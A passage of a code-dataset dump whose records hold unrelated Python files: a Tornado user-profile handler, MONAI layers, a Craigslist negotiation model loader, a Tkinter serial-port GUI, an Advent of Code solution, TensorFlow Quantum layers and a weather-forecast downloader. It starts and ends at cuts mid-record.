e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write({\"errcode\":RET.DBERR, \"errmsg\":\"update failed\"})\n\t\tself.write({\"errcode\":RET.OK, \"errmsg\":\"OK\"})\n\n\nclass NameHandler(BaseHandler):\n\t\"\"\"设置用户名\"\"\"\n\t#/api/profile/name\n\t@required_login\n\tdef post(self):\n\t\t# 从session中获取用户身份,user_id\n\t\tuser_id = self.session.data[\"user_id\"]\n\t\tname = self.json_args.get(\"name\")\n\n\t\t# 判断name是否传了,并且不应为空字符串\n\t\t# if name == None or \"\" == name:\n\t\tif name in (None, \"\"):\n\t\t\treturn self.write({\"errcode\":RET.PARAMERR, \"errmsg\":\"params error\"})\n\n\t\t# 保存用户昵称name,并同时判断name是否重复(利用数据库的唯一索引)\n\t\ttry:\n\t\t\tself.db.execute_rowcount(\"update ih_user_profile set up_name=%s where up_user_id=%s\", name, user_id)\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write({\"errcode\":RET.DBERR, \"errmsg\":\"name has exist\"})\n\n\t\t# 修改session数据中的name字段,并保存到redis中 \n\t\t#care here\n\t\tself.session.data[\"name\"] = name\n\t\ttry:\n\t\t\tself.session.save()\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\tself.write({\"errcode\":RET.OK, \"errmsg\":\"OK\"})\n","sub_path":"tornado/xHome/handlers/Profile.py","file_name":"Profile.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"21460694","text":"# Copyright 2020 MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom monai.networks.layers.convutils import gaussian_1d, same_padding\nfrom monai.utils.misc import ensure_tuple_rep\n\n__all__ = [\"SkipConnection\", \"Flatten\", \"GaussianFilter\"]\n\n\nclass SkipConnection(nn.Module):\n \"\"\"Concats the forward pass input with the result from the given submodule.\"\"\"\n\n def __init__(self, submodule, cat_dim=1):\n super().__init__()\n self.submodule = submodule\n self.cat_dim = cat_dim\n\n def forward(self, x):\n return torch.cat([x, self.submodule(x)], self.cat_dim)\n\n\nclass Flatten(nn.Module):\n \"\"\"Flattens the given input in the forward pass to be [B,-1] in shape.\"\"\"\n\n def forward(self, x):\n return x.view(x.size(0), -1)\n\n\nclass Reshape(nn.Module):\n \"\"\"\n Reshapes input tensors to the given shape (minus batch dimension), retaining original batch size.\n \"\"\"\n\n def __init__(self, *shape):\n \"\"\"\n Given a shape list/tuple `shape` of integers (s0, s1, ... , sn), this layer will reshape input tensors of\n shape (batch, s0 * s1 * ... * sn) to shape (batch, s0, s1, ... , sn).\n\n Args:\n shape: list/tuple of integer shape dimensions \n \"\"\"\n super().__init__()\n self.shape = (1,) + tuple(shape)\n\n def forward(self, x):\n shape = list(self.shape)\n shape[0] = x.shape[0] # done this way for Torchscript\n return x.reshape(shape)\n\n\nclass GaussianFilter(nn.Module):\n def __init__(self, spatial_dims: int, sigma, truncated: float = 4.0):\n \"\"\"\n Args:\n spatial_dims: number of spatial dimensions of the input image.\n must have shape (Batch, channels, H[, W, ...]).\n sigma (float or sequence of floats): std.\n truncated: spreads how many stds.\n \"\"\"\n super().__init__()\n self.spatial_dims = int(spatial_dims)\n _sigma = ensure_tuple_rep(sigma, self.spatial_dims)\n self.kernel = [\n torch.nn.Parameter(torch.as_tensor(gaussian_1d(s, truncated), dtype=torch.float), False) for s in _sigma\n ]\n self.padding = [same_padding(k.size()[0]) for k in self.kernel]\n self.conv_n = [F.conv1d, F.conv2d, F.conv3d][spatial_dims - 1]\n for idx, param in enumerate(self.kernel):\n self.register_parameter(f\"kernel_{idx}\", param)\n\n def forward(self, x: torch.Tensor):\n \"\"\"\n Args:\n x (tensor): in shape [Batch, chns, H, W, D].\n \"\"\"\n if not torch.is_tensor(x):\n raise TypeError(f\"x must be a Tensor, got {type(x).__name__}.\")\n chns = x.shape[1]\n sp_dim = self.spatial_dims\n x = x.clone() # no inplace change of x\n\n def _conv(input_, d):\n if d < 0:\n return input_\n s = [1] * (sp_dim + 2)\n s[d + 2] = -1\n kernel = self.kernel[d].reshape(s)\n kernel = kernel.repeat([chns, 1] + [1] * sp_dim)\n padding = [0] * sp_dim\n padding[d] = self.padding[d]\n return self.conv_n(input=_conv(input_, d - 1), weight=kernel, padding=padding, groups=chns)\n\n return _conv(x, sp_dim - 1)\n","sub_path":"monai/networks/layers/simplelayers.py","file_name":"simplelayers.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"471721821","text":"from systems.neural_system import PytorchNeuralSystem\nfrom neural import model_builder\nfrom cocoa.core.schema import Schema\nfrom cocoa.core.scenario_db import ScenarioDB\nfrom core.scenario import Scenario\nfrom pathlib2 import Path\nimport pickle\nimport torch\nimport json\n\n\nFILE_PATH = Path(__file__).absolute().parent\n\nclass Loader:\n \"\"\"Load the pre-trained policy pickle files from Codalabs. Assumes\n the file directory structure in the Dockerfile.\n\n \"\"\"\n\n SCHEMA_PATH = str(FILE_PATH/\"data\"/\"craigslist-schema.json\")\n MODEL_PATH = str(FILE_PATH/\"checkpoint\"/\"lf2lf\"/\"model_best.pt\")\n PRICE_TRACKER_PATH = str(FILE_PATH/\"price_tracker.pkl\")\n DATA_PATH = str(FILE_PATH/\"data\"/\"dev.json\")\n\n def __init__(self, use_gpu=False):\n # make args that are supposed to be passed in by command line arguments\n args = {\n \"model\": \"lf2lf\",\n \"word_vec_size\": 300,\n \"dropout\": 0.,\n \"encoder_type\": \"rnn\",\n \"decoder_type\": \"rnn\",\n \"context_embedder_type\": \"mean\",\n \"global_attention\": \"multibank_general\",\n \"share_embeddings\": False,\n \"share_decoder_embeddings\": False,\n \"enc_layers\": 1,\n \"copy_attn\": False,\n \"dec_layers\": 1,\n \"pretrained_wordvec\": \"\",\n \"rnn_size\": 300,\n \"rnn_type\": \"LSTM\",\n \"enc_layers\": 1,\n \"num_context\": 2,\n \"stateful\": True,\n \"sample\": True,\n \"max_length\": 10,\n \"n_best\": 1,\n \"batch_size\": 128,\n \"optim\": \"adagrad\",\n \"alpha\": 0.01,\n \"temperature\": 0.5,\n \"epochs\": 30,\n \"report_every\": 500,\n }\n if use_gpu:\n args.gpuid = 0\n\n # HACK: convert args from dict into object. Ex. args[\"epochs\"]\n # becomes args.epochs\n args = type(\"args\", (), args)\n\n # load price tracker\n with open(self.PRICE_TRACKER_PATH) as f:\n price_tracker = pickle.load(f)\n\n # load schema\n schema = Schema(self.SCHEMA_PATH)\n\n # load system\n self.system = PytorchNeuralSystem(\n args, schema, price_tracker, self.MODEL_PATH, False\n )\n\n # load scenario db\n with open(self.DATA_PATH) as f:\n raw = json.load(f)\n raw = [r[\"scenario\"] for r in raw] # HACK\n self.scenario_db = ScenarioDB.from_dict(schema, raw, Scenario)\n\n def from_uuid(self, agent, uuid):\n \"\"\"Return a session object given a uuid and agent number\"\"\"\n scenario = self.scenario_db.get(uuid)\n kb = scenario.get_kb(agent)\n return scenario, self.system.new_session(agent, kb), kb\n\n\nif __name__ == \"__main__\":\n from sessions.cmd_session import CmdSession\n from core.controller import Controller\n loader = Loader()\n scenario, session, kb = loader.from_uuid(0, \"S_To118PXuNicOd8SO\")\n cmd_session = CmdSession(1, kb)\n controller = Controller(scenario, [session, cmd_session])\n controller.simulate()\n","sub_path":"craigslistbargain/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"241206596","text":"from tkinter import Frame, LabelFrame, Tk, Menu, OptionMenu, StringVar\nfrom tkinter.ttk import Button, Style\nfrom ctypes import windll\nimport platform\nfrom screeninfo import get_monitors\nfrom threading import Thread\nfrom queue import Queue\nimport queue\nimport serial\nimport sys\nimport glob\n\nfont_h1 = 'Corbel 14 bold'\nfont_h2 = 'Corbel 14 '\nfont_body = 'Corbel 12'\n\n\ndef buscarPuertos():\n \"\"\" Lists serial port names\n\n :raises EnvironmentError:\n On unsupported or unknown platforms\n :returns:\n A list of the serial ports available on the system\n \"\"\"\n if sys.platform.startswith('win'):\n ports = ['COM%s' % (i + 1) for i in range(256)]\n elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n # this excludes your current terminal \"/dev/tty\"\n ports = glob.glob('/dev/tty[A-Za-z]*')\n elif sys.platform.startswith('darwin'):\n ports = glob.glob('/dev/tty.*')\n else:\n raise EnvironmentError('Unsupported platform')\n\n result = []\n for port in ports:\n try:\n s = serial.Serial(port)\n s.close()\n result.append(port)\n except (OSError, serial.SerialException):\n pass\n return result\n\n\nclass Frontend:\n def __init__(self, master, event):\n self.master = master\n self.event = event\n self.opciones_de_puerto = ['-']\n operatingSystem = platform.system()\n if operatingSystem == 'Windows':\n release = platform.release()\n if release == '7':\n windll.user32.SetProcessDPIAware(1) # Windows 7 y vista\n elif release == '10' or '8':\n windll.shcore.SetProcessDpiAwareness(1) # Windows 10 y 8\n\n self.master.title(\"GUI: Gimbal 2DOF\")\n rootWidth = int(screenWidth * 0.4)\n rootHeight = int(screenHeight * 0.8)\n posWidth = (screenWidth - rootWidth) // 2\n posHeight = (screenHeight - rootHeight) // 2\n self.master.geometry(f\"{rootWidth}x{rootHeight}+{posWidth}+{posHeight}\")\n # TODO: CREACIÓN DE WIDGETS:\n # ------------------------------------------ PLOT1\n self.plot1_label_frame = LabelFrame(\n self.master,\n text='Variables reguladas',\n font=font_h1,\n fg='#267eb5'\n )\n # ------------------------------------------ PLOT2\n self.plot2_label_frame = LabelFrame(\n self.master,\n text='Acciones de control',\n font=font_h1,\n fg='#267eb5'\n )\n # ------------------------------------------ BOTÓN\n self.style_button = Style()\n self.style_button.configure(\n 'style_button.TButton',\n foreground='#267eb5',\n font=font_h2,\n relief=\"flat\",\n background=\"#ccc\"\n )\n # ------------------------------------------ CONFIGURACION\n self.frame_config = Frame(self.master)\n self.conectar_button = Button(\n self.frame_config,\n text='Conectar',\n style='style_button.TButton',\n command=lambda: event_queue.put('CONECTAR')\n )\n self.puerto_seleccionado = StringVar()\n self.puerto_seleccionado.set('Puertos')\n self.puertos_optionMenu = OptionMenu(\n self.frame_config,\n self.puerto_seleccionado,\n *self.opciones_de_puerto\n )\n\n # TODO: MAQUETADO DE WIDGETS:\n self.plot1_label_frame.pack(\n fill='both',\n expand=1,\n anchor='center',\n padx=10,\n pady=(10, 5)\n )\n self.plot2_label_frame.pack(\n fill='both',\n expand=1,\n anchor='center',\n padx=10,\n pady=(5, 10)\n )\n self.frame_config.pack(\n padx=5,\n pady=(5, 10)\n )\n self.conectar_button.grid(row=0, column=0)\n self.puertos_optionMenu.grid(row=0, column=1)\n\n def crearPuerto(self, puerto):\n print('puerto CREADO')\n menu = self.puertos_optionMenu['menu']\n menu.add_command(\n label=puerto,\n command=lambda puerto=puerto: self.puerto_seleccionado.set(puerto)\n )\n\n def eliminarPuerto(self, puerto):\n print('puerto ELIMINADO')\n menu = self.puertos_optionMenu['menu']\n last = menu.index(\"end\")\n items = []\n for index in range(last + 1):\n items.append(menu.entrycget(index, \"label\"))\n pos = items.index(puerto)\n menu.delete(pos)\n\n\ndef Backend(gui):\n mainMenu = ''\n puertos_creados = []\n while True:\n try:\n event = event_queue.get(timeout=0.001)\n except queue.Empty:\n pass\n\n else:\n print(event)\n\n puertos_encontrados = buscarPuertos()\n for puerto in puertos_encontrados:\n if not puerto in puertos_creados:\n puertos_creados.append(puerto)\n gui.crearPuerto(puerto)\n\n cant_puertos_encontrados = len(puertos_encontrados)\n cant_puertos_creados = len(puertos_creados)\n if cant_puertos_creados != cant_puertos_encontrados:\n for puerto in puertos_creados:\n if not puerto in puertos_encontrados:\n pos = puertos_creados.index(puerto)\n puertos_creados.pop(pos)\n gui.eliminarPuerto(puerto)\n\n print(f\"puertos creados {puertos_creados}, var:{gui.puerto_seleccionado.get()}\")\n\n\nif __name__ == '__main__':\n get_monitors()\n root = Tk()\n root.attributes('-topmost', 1)\n screenWidth = root.winfo_screenwidth()\n screenHeight = root.winfo_screenheight()\n event_queue = Queue()\n UI = Frontend(root, event_queue)\n th = Thread(target=Backend, args=(UI,))\n th.daemon = True\n th.start()\n root.mainloop()\n","sub_path":"GUI_.py","file_name":"GUI_.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"498473429","text":"def read_input_paths(filename):\n paths = []\n for line in open(filename).readlines():\n paths.append(line.strip().split(\",\"))\n return paths\n\n\n# Calculate the change in location on both the horizontal and vertical\n# axes caused by a step instruction (e.g. R29)\ndef calculate_delta_distances(step):\n direction = step[0]\n magnitude = int(step[1:])\n dx = dy = 0\n\n if direction == \"R\":\n dx = magnitude\n elif direction == \"L\":\n dx = -magnitude\n elif direction == \"U\":\n dy = magnitude\n elif direction == \"D\":\n dy = -magnitude\n\n return (dx, dy)\n\n\n# Calculate the integer values between two points\ndef calculate_nums_between(x0, x1):\n direction = -1 if x0 > x1 else 1\n return list(range(x0 + direction, x1, direction))\n\n\n# Calculate the 2D coordinates between two points\ndef calculate_joining_coords(p0, p1):\n joining_coords = []\n # If the x-value is not the same...\n if p0[0] != p1[0]:\n for x in calculate_nums_between(p0[0], p1[0]):\n joining_coords.append((x, p0[1]))\n else:\n for y in calculate_nums_between(p0[1], p1[1]):\n joining_coords.append((p0[0], y))\n return joining_coords\n\n\nBASE_POINT = (0, 0)\n\n\n# Calculate all line coordinates from a sequence of steps\n# i.e a 'path'\ndef calculate_line_coordinates(path):\n # The 2D coordinates at the ends of each line\n points = [BASE_POINT]\n # The 2D coordinates in between each point\n segments = []\n for i, step in enumerate(path):\n deltas = calculate_delta_distances(step)\n current_point = points[i]\n next_point = (current_point[0] + deltas[0], current_point[1] + deltas[1])\n segments.append(calculate_joining_coords(current_point, next_point))\n points.append(next_point)\n\n # Joining points and segments in order of step sequence\n all_coords = [BASE_POINT]\n for i, point in enumerate(points[1:]):\n for coord in segments[i]:\n all_coords.append(coord)\n all_coords.append(point)\n return all_coords\n\n\nclass Wire:\n def __init__(self, path):\n self.coords = calculate_line_coordinates(path)\n\n\n# Calculates the points that are shared between two wires\ndef get_intersections(wire0, wire1):\n intersects = list(set(wire0.coords).intersection(set(wire1.coords)))\n intersects.remove(BASE_POINT)\n return intersects\n\n\n# Calculates the amount of steps taken by both wires to reach a\n# certain intersection\ndef get_combined_steps(wire0, wire1, intersection):\n return wire0.coords.index(intersection) + wire1.coords.index(intersection)\n\n\n# Calculates the intersection between two wires that has the shortest\n# amount of combined steps to reach\ndef get_closest_step_intersection(wire0, wire1):\n intersections = get_intersections(wire0, wire1)\n # Initialise the closest step count as that of the first intersection\n closest_steps = get_combined_steps(wire0, wire1, intersections[0])\n for intersect in intersections[1:]:\n steps = get_combined_steps(wire0, wire1, intersect)\n if steps < closest_steps:\n closest_steps = steps\n return closest_steps\n\n\nWIRES = []\nfor path in read_input_paths(\"res/day_three_inputs.txt\"):\n WIRES.append(Wire(path))\nprint(get_closest_step_intersection(WIRES[0], WIRES[1]))\n","sub_path":"src/day_three.py","file_name":"day_three.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"158893717","text":"import uuid\nimport os\n\nclass Args:\n \"\"\"args for NAPS\"\"\"\n\n def __init__(self, instance_path, form):\n self.directory = os.path.join(instance_path, 'tmp_' + str(uuid.uuid4()))\n self.shift_file = os.path.join(self.directory, 'shift.txt')\n self.pred_file = os.path.join(self.directory, 'pred.txt')\n self.output_file = os.path.join(self.directory, 'output.txt')\n self.plot_file = os.path.join(self.directory, 'plot.png')\n self.shift_type = form['shift_type'].strip().lower()\n self.pred_type = form['pred_type'].strip().lower()\n\n def argsToList(self):\n return [\n self.shift_file,\n self.pred_file,\n self.output_file,\n '--shift_type', self.shift_type,\n '--pred_type', self.pred_type,\n '--plot_file', self.plot_file,\n '-c', '../config/config.txt',\n #'-l', '../output/test.log'\n ]","sub_path":"webApp/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"283165614","text":"import numbers\n\nimport cirq\nimport numpy as np\nimport sympy\nimport tensorflow as tf\n\nimport tensorflow_quantum as tfq\nfrom tensorflow_quantum.core.ops import tfq_unitary_op\nfrom tensorflow_quantum.python import util\nfrom tensorflow_quantum.python.layers.circuit_construction import elementary\nfrom tensorflow_quantum.python.layers.circuit_executors import (\n expectation, input_checks, sampled_expectation)\n\n\nclass HybridControlledPQC(tf.keras.layers.Layer):\n \"\"\"Hybrid Controlled Parametrized Quantum Circuit (PQC) Layer.\"\"\"\n\n def __init__(self,\n model_circuit,\n operators,\n *,\n controlled_symbol_names=None,\n native_symbol_names=None,\n repetitions=None,\n backend=None,\n initializer=tf.keras.initializers.RandomUniform(0, 2 * np.pi),\n regularizer=None,\n constraint=None,\n differentiator=None,\n **kwargs):\n \"\"\"Instantiate this layer.\n Create a layer that will output expectation values of the given\n operators when fed quantum data to it's input layer. This layer will\n take two input tensors, one representing a quantum data source (these\n circuits must not contain any symbols) and the other representing\n control parameters for the model circuit that gets appended to the\n datapoints.\n model_circuit: `cirq.Circuit` containing `sympy.Symbols` that will be\n used as the model which will be fed quantum data inputs.\n operators: `cirq.PauliSum` or Python `list` of `cirq.PauliSum` objects\n used as observables at the end of the model circuit.\n repetitions: Optional Python `int` indicating how many samples to use\n when estimating expectation values. If `None` analytic expectation\n calculation is used.\n backend: Optional Backend to use to simulate states. Defaults to\n the native TensorFlow simulator (None), however users may also\n specify a preconfigured cirq simulation object to use instead.\n If a cirq object is given it must inherit `cirq.SimulatesFinalState`\n if `sampled_based` is True or it must inherit `cirq.Sampler` if\n `sample_based` is False.\n differentiator: Optional `tfq.differentiator` object to specify how\n gradients of `model_circuit` should be calculated.\n \"\"\"\n super().__init__(**kwargs)\n # Ingest model_circuit.\n if not isinstance(model_circuit, cirq.Circuit):\n raise TypeError(\"model_circuit must be a cirq.Circuit object.\"\n \" Given: \".format(model_circuit))\n self._symbols_list = list(\n sorted(util.get_circuit_symbols(model_circuit)))\n\n# self._native_symbols_list = list(sorted(controlled_symbol_names))\n# self._controlled_symbols_list = list(sorted(native_symbol_names))\n# self._native_symbols = tf.constant([str(x) for x in self._native_symbols_list])\n# self._controlled_symbols = tf.constant([str(x) for x in self._controlled_symbols_list])\n\n self._symbols = tf.constant(\n [str(x) for x in native_symbol_names + controlled_symbol_names])\n\n self._circuit = util.convert_to_tensor([model_circuit])\n\n if len(self._symbols_list) == 0:\n raise ValueError(\"model_circuit has no sympy.Symbols. Please \"\n \"provide a circuit that contains symbols so \"\n \"that their values can be trained.\")\n\n # Ingest operators.\n if isinstance(operators, (cirq.PauliString, cirq.PauliSum)):\n operators = [operators]\n\n if not isinstance(operators, (list, np.ndarray, tuple)):\n raise TypeError(\"operators must be a cirq.PauliSum or \"\n \"cirq.PauliString, or a list, tuple, \"\n \"or np.array containing them. \"\n \"Got {}.\".format(type(operators)))\n if not all([\n isinstance(op, (cirq.PauliString, cirq.PauliSum))\n for op in operators\n ]):\n raise TypeError(\"Each element in operators to measure \"\n \"must be a cirq.PauliString\"\n \" or cirq.PauliSum\")\n\n self._operators = util.convert_to_tensor([operators])\n\n # Ingest and promote repetitions.\n self._analytic = False\n if repetitions is None:\n self._analytic = True\n\n if not self._analytic and not isinstance(\n repetitions, numbers.Integral):\n raise TypeError(\"repetitions must be a positive integer value.\"\n \" Given: \".format(repetitions))\n\n if not self._analytic and repetitions <= 0:\n raise ValueError(\"Repetitions must be greater than zero.\")\n\n if not self._analytic:\n self._repetitions = tf.constant(\n [[repetitions for _ in range(len(operators))]],\n dtype=tf.dtypes.int32)\n\n if not isinstance(\n backend,\n cirq.Sampler) and repetitions is not None and backend is not None:\n raise TypeError(\"provided backend does not inherit cirq.Sampler \"\n \"and repetitions!=None. Please provide a backend \"\n \"that inherits cirq.Sampler or set \"\n \"repetitions=None.\")\n\n if not isinstance(backend, cirq.SimulatesFinalState\n ) and repetitions is None and backend is not None:\n raise TypeError(\"provided backend does not inherit \"\n \"cirq.SimulatesFinalState and repetitions=None. \"\n \"Please provide a backend that inherits \"\n \"cirq.SimulatesFinalState.\")\n\n # Ingest backend and differentiator.\n if self._analytic:\n self._layer = expectation.Expectation(\n backend=backend, differentiator=differentiator)\n else:\n self._layer = sampled_expectation.SampledExpectation(\n backend=backend, differentiator=differentiator)\n\n self._append_layer = elementary.AddCircuit()\n\n # create weights for only native symbols\n\n if not all(\n name in self._symbols_list for name in controlled_symbol_names):\n raise ValueError(\n \"model_circuit does not contain all controlled symbol names \")\n\n # Set additional parameter controls.\n self.initializer = tf.keras.initializers.get(initializer)\n self.regularizer = tf.keras.regularizers.get(regularizer)\n self.constraint = tf.keras.constraints.get(constraint)\n\n # Weight creation is not placed in a Build function because the number\n # of weights is independent of the input shape.\n self._native_symbol_values = self.add_weight(\n 'parameters',\n shape=(\n len(native_symbol_names),\n ),\n initializer=self.initializer,\n regularizer=self.regularizer,\n constraint=self.constraint,\n dtype=tf.float32,\n trainable=True)\n\n @property\n def symbols(self):\n \"\"\"The symbols that are managed by this layer (in-order).\n Note: `symbols[i]` indicates what symbol name the managed variables in\n this layer map to.\n \"\"\"\n return [sympy.Symbol(x) for x in self._symbols_list]\n\n def symbol_values(self):\n \"\"\"Returns a Python `dict` containing symbol name, value pairs.\n Returns:\n Python `dict` with `str` keys and `float` values representing\n the current symbol values.\n \"\"\"\n return dict(zip(self.symbols, self.get_weights()[0]))\n\n def build(self, input_shape):\n \"\"\"Keras build function.\"\"\"\n super().build(input_shape)\n\n def call(self, controlled_symbol_values):\n \"\"\"Keras call function.\"\"\"\n circuit_batch_dim = tf.gather(tf.shape(controlled_symbol_values), 0)\n tiled_up_model = tf.tile(self._circuit, [circuit_batch_dim])\n tiled_up_operators = tf.tile(self._operators, [circuit_batch_dim, 1])\n tiled_up_native_symbol_values = tf.tile(\n [self._native_symbol_values], [circuit_batch_dim, 1])\n symbol_values = tf.concat(\n [tiled_up_native_symbol_values, controlled_symbol_values], 1)\n # tiled_up_parameters = tf.tile(symbol_values, [circuit_batch_dim, 1])\n\n if self._analytic:\n return self._layer(tiled_up_model,\n symbol_names=self._symbols,\n symbol_values=symbol_values,\n operators=tiled_up_operators)\n else:\n tiled_up_repetitions = tf.tile(self._repetitions,\n [circuit_batch_dim, 1])\n return self._layer(tiled_up_model,\n symbol_names=self._symbols,\n symbol_values=symbol_values,\n operators=tiled_up_operators,\n repetitions=tiled_up_repetitions)\n\n\nclass Unitary(tf.keras.layers.Layer):\n\n def __init__(self, **kwargs):\n \"\"\"Instantiate a Unitary Layer.\n Create a layer that will calculate circuit unitary matrices and output\n them into the TensorFlow graph given a correct set of inputs.\n \"\"\"\n super().__init__(**kwargs)\n self.unitary_op = tfq_unitary_op.get_unitary_op()\n self._w = None\n\n @tf.function\n def call(self, inputs,\n *,\n symbol_names=None,\n symbol_values=None,\n initializer=tf.keras.initializers.RandomUniform(0, 2 * np.pi)):\n \"\"\"Keras call function.\n Input options:\n `inputs`, `symbol_names`, `symbol_values`:\n see `input_checks.expand_circuits`\n Output shape:\n `tf.RaggedTensor` with shape:\n [batch size of symbol_values, , ]\n or\n [number of circuits, , ]\n \"\"\"\n\n values_empty = False\n if symbol_values is None:\n values_empty = True\n\n inputs, symbol_names, symbol_values = input_checks.expand_circuits(\n inputs, symbol_names, symbol_values)\n\n circuit_batch_dim = tf.gather(tf.shape(inputs), 0)\n\n if values_empty:\n # No symbol_values were provided. So we assume the user wants us\n # to create and manage variables for them. We will do so by\n # creating a weights variable and tiling it up to appropriate\n # size of [batch, num_symbols].\n\n if self._w is None:\n # don't re-add variable.\n self._w = self.add_weight(name='circuit_learnable_parameters',\n shape=symbol_names.shape,\n initializer=initializer)\n\n symbol_values = tf.tile(tf.expand_dims(self._w, axis=0),\n tf.stack([circuit_batch_dim, 1]))\n\n unitary = self.unitary_op(inputs, symbol_names, symbol_values)\n return unitary.to_tensor()\n\n\nclass QSP(tf.keras.layers.Layer):\n \"\"\" QSP for \"\"\"\n\n def __init__(self, poly_deg=0, **kwargs):\n super().__init__(**kwargs)\n self.q = cirq.GridQubit(0, 0)\n self.poly_deg = poly_deg\n self.symbol_names = [sympy.Symbol(f'phi{k}') for k in range(\n poly_deg + 1)] + [sympy.Symbol(f'th')]\n\n initializer = tf.keras.initializers.RandomUniform(0, 2 * np.pi)\n\n self.phi = self.add_weight(name='circuit_learnable_parameters',\n shape=(poly_deg + 1,),\n initializer=initializer)\n\n @tf.function\n def call(self, theta_inp):\n \"\"\"Keras call function.\n Input options:\n `inputs`, `symbol_names`, `symbol_values`:\n see `input_checks.expand_circuits`\n Output shape:\n `tf.RaggedTensor` with shape:\n [batch size of symbol_values, , ]\n or\n [number of circuits, , ]\n \"\"\"\n\n wx = cirq.Circuit(cirq.rx(2 * theta_inp))\n self.rot_zs = [cirq.Circuit(cirq.rz(2 * self.phi[k])(self.q))\n for k in range(self.poly_deg)]\n\n full_circuit = self.rot_zs[0]\n full_circuit_test = cirq.Circuit(\n cirq.rz(2 * self.symbol_names[0])(self.q),\n cirq.rx(2 * self.symbol_names[-1])(self.q),\n cirq.rz(2 * self.symbol_names[0])(self.q)\n )\n\n phi_values = tf.expand_dims(self.phi, axis=0)\n symbol_values = tf.expand_dims(tf.concat([self.phi, [4]], 0), 0)\n\n tensor_full_circuit_test = tfq.convert_to_tensor([full_circuit_test])\n tfq.from_tensor(tfq.resolve_parameters(\n tensor_full_circuit_test, self.symbol_names, symbol_values))\n\n return full_circuit_test.unitary()[0, 0]\n","sub_path":"pyqsp/qsp_models/tfq_qsp_layers.py","file_name":"tfq_qsp_layers.py","file_ext":"py","file_size_in_byte":13289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"376077988","text":"\"\"\"\nhandle download of nwp from remote servers\n\"\"\"\nfrom pathlib import Path\nfrom urllib.request import urlopen\nfrom io import BytesIO\nfrom typing import Dict, List, Tuple\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\n\n\nfrom src.enumerations.weather_models import WeatherModels\nfrom src.modules.download.local_store import bunzip_store, store, tarfile_store\nfrom src.modules.config.constants import KEY_LOCAL_FILE_PATHS, \\\n KEY_REMOTE_FILE_PATHS, KEY_COMPRESSION, KEY_REMOTE_SERVER_TYPE\nfrom src.modules.config.configurations import MODEL_CONFIG\n\nDEFAULT_NUMBER_OF_PARALLEL_PROCESSES = 2\n\n\ndef download(\n weather_model: WeatherModels,\n model_file_lists: Dict[str, List[Path]],\n parallel_download: bool = False,\n n_processes: int = DEFAULT_NUMBER_OF_PARALLEL_PROCESSES\n) -> None:\n \"\"\"\n download weather forecasts\n \"\"\"\n if weather_model == WeatherModels.HARMONIE_KNMI:\n __download_tar_file(weather_model,\n model_file_lists[KEY_REMOTE_FILE_PATHS][0],\n model_file_lists[KEY_LOCAL_FILE_PATHS])\n return None\n\n if parallel_download:\n download_specifications = \\\n [(weather_model, local_file_path, remote_file)\n for remote_file, local_file_path in\n zip(model_file_lists[KEY_REMOTE_FILE_PATHS],\n model_file_lists[KEY_LOCAL_FILE_PATHS])]\n __download_parallel(download_specifications, n_processes)\n else:\n for remote_file, local_file_path in zip(model_file_lists[KEY_REMOTE_FILE_PATHS],\n model_file_lists[KEY_LOCAL_FILE_PATHS]):\n __download((weather_model, local_file_path, remote_file))\n\n\ndef __download(\n download_specification: Tuple[WeatherModels, Path, Path]\n) -> None:\n \"\"\"\n base download function to manage single file download\n\n Args:\n download_specification: Tuple with\n - WeatherModels\n - local_file_path\n - remote_file_path\n\n Returns:\n Stores a file in temporary directory\n \"\"\"\n weather_model = download_specification[0].value\n downloaded_file = urlopen(\n f\"{MODEL_CONFIG[weather_model][KEY_REMOTE_SERVER_TYPE]}:\"\n f\"//{download_specification[2]}\")\n\n if not download_specification[1].parent.is_dir(): download_specification[1].parent.mkdir()\n\n if MODEL_CONFIG[weather_model][KEY_COMPRESSION] == 'bz2':\n bunzip_store(BytesIO(downloaded_file.read()), download_specification[1])\n else:\n store(downloaded_file, download_specification[1])\n\n\ndef __download_parallel(\n download_specifications: List[Tuple[WeatherModels, Path, Path]],\n n_processes: int = DEFAULT_NUMBER_OF_PARALLEL_PROCESSES) -> None:\n \"\"\"\n Script to run download in parallel \n Args:\n download_specifications: List of Tuple with\n - WeatherModels\n - local_file_path\n - remote_file_path\n n_processes: Number of parallel processes used for download\n Returns:\n None\n \"\"\"\n with ThreadPoolExecutor(max_workers=n_processes) as executor:\n executor.map(__download, download_specifications)\n\n executor.shutdown(wait=True)\n\n\ndef __download_tar_file(\n weather_model: WeatherModels,\n remote_file: Path,\n local_file_list: List[Path]\n) -> None:\n \"\"\"\n Downloads a weather forecast package with one tar archive\n Args:\n weather_model:\n remote_file:\n local_file_list:\n\n Returns:\n\n \"\"\"\n downloaded_file = urlopen(\n f\"{MODEL_CONFIG[weather_model.value][KEY_REMOTE_SERVER_TYPE]}:\"\n f\"//{remote_file}\")\n tarfile_store(downloaded_file, 